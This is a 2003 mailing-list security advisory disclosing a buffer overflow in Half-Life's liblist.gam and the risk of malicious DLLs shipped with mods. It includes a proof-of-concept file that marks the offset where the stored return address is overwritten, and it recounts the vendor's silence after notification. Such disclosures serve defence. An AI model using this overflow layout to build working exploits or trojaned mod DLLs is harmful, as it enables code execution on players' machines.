[Dshield] Half-Life: fun with MODs

Auriemma Luigi aluigi at pivx.com
Tue Jul 29 18:32:55 GMT 2003


######################################################################

Applications: Half-Life (http://half-life.sierra.com) MODs.
Versions:     1.1.1.0
Platforms:    Windows
Bugs:         Buffer overflow in liblist.gam and arbitrary code 
              execution through customized DLL files
Risk:         High
Author:       Auriemma Luigi
              Senior Security Researcher, PivX Solutions, LLC
              e-mail: aluigi at pivx.com
              web:    http://www.pivx.com/luigi/


######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix
5) Philosophy


######################################################################

===============
1) Introduction
===============


Valve's Half-Life was released in 1998 but still remains as the worlds 
most popular FPS game.

The success of the game is largely due to the overwhelming community 
support, which has spawned a range of MODs for the game - including 
the popular Counter-Strike MOD and Day Of Defeat.

The cause of these problems are MODs.
One of these problems is an inherent flaw in the basic structure of
Half-Life and cannot be fixed without fundamental changes.



######################################################################

======
2) Bug
======


The 2 bugs are:


---------------------------------
[A] Buffer-overflow in liblist.gam
---------------------------------

Liblist.gam is a text file present in every MOD. The problem is a
buffer overflow caused by long values.

The following liblist.gam demonstrate the problem:

---liblist.gam---

game
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaEIPxaaaaaaaaaaaa"
gamedll "what you want"

-----------------


The buffer-overflow happens when there is a value of 276 bytes and
only when the gamedll parameter is specified.

NOTE: The important and "strange" thing to see is that the stored
return address is overwritten by the 4 bytes at offset 260 of the
value.
We need to add another 12 bytes after it to cause the buffer-overflow
and successfully overwriting the stored EIP.



--------------------------------------
[B] Do you know the DLL files in MODs?
--------------------------------------


A lot of MODs are distributed with custom DLL files that are contained
in the folders "dlls" and "cl_dlls".

The problem is easily explained:

The DLL files used by MODs are real binary libraries that can contain
all the code you want!
Which means that I can create a malicious DLL that I distribute with
a MOD and everyone that use it will run my malicious code.

This problem "CANNOT" be fixed by Valve, so be careful when you use an
unknown MOD or you download a MOD from an non-trusted site.



######################################################################

===========
3) The Code
===========


---------------------------------
[A] Buffer-overflow in liblist.gam
---------------------------------

---liblist.gam---

game
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaEIPxaaaaaaaaaaaa"
gamedll "what you want"

-----------------



--------------------------------------
[B] Do you know the DLL files in MODs?
--------------------------------------


Create a Half-Life DLL or add any malicious code in a existent DLL.



#######################################################################

======
4) Fix
======


Valve was notified of this vulnerability on April 14 2003, and replied
that they were working to patch these bugs.

Since that last point of contact, Valve and it's representatives have
been contacted on multiple occasions for a status update on the patch,
without any replies.



#######################################################################

==========================
5) Researcher's Philosophy
==========================


Be free.
The researchers' community needs your reversing, your programs, and
your research. Never let your passion die and don't stop your work!

Disclosure:
Full and responsible disclosure can lead to a quick fix, and prevent a 
problem before it gets into the wrong hands.



#######################################################################

====================
About PivX Solutions
====================


PivX Solutions, is a premier network security consultancy offering a
myriad of network security services to our clients.

For more information go to http://www.PivX.com


#######################################################################



--- 
Researcher
http://www.pivx.com/luigi/





More information about the list mailing list